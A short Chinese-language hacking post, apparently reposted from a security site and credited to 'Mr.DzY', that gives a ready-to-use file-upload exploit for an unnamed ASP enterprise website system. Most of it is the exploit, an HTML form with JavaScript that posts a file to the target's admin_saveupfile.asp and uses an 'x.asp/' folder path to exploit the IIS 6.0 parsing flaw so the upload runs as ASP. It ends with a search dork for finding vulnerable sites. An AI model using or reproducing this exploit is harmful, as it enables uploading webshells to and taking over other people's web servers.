from www.0855.tv
by Mr.DzY
一个很漂亮的 asp 版企业 系统 ,作者未知,名称未知,版权未知……
废话也懒得说,上exp。
测试示例:
<title>上传EXP by Mr.DzY</title>
<center>
<form action="" method=post enctype="multipart/form-data">
<INPUT TYPE="hidden" name="MAX_FILE_SIZE" value="50">
网址:<input type=text name=url value="http://www.2cto.com/" size=62><br><br>
<td><input name="file" type="file" size="45" onChange="showpic(this.value)"><input type="hidden" name="filepath" value="Mr.DzY.asp/"><input name="hdnISSPic" type="hidden" id="hdnISSPic" value=""></td><br><br>
<input type=button value=大牛啊,点我上传吧onclick=fsubmit()>
</form><br>
<script>
function fsubmit(){
form = document.forms[0];
form.action = form.url.value+'/admin/admin_saveupfile.asp';
form.submit();
}
</script>
keyword:
inurl:ShowProduct.asp?id= 请在这里输入产品的详细说明(可插入图片)
查看更多关于某公司网站鸡肋上传漏洞(IIS6.0解析漏洞) - 网的详细内容...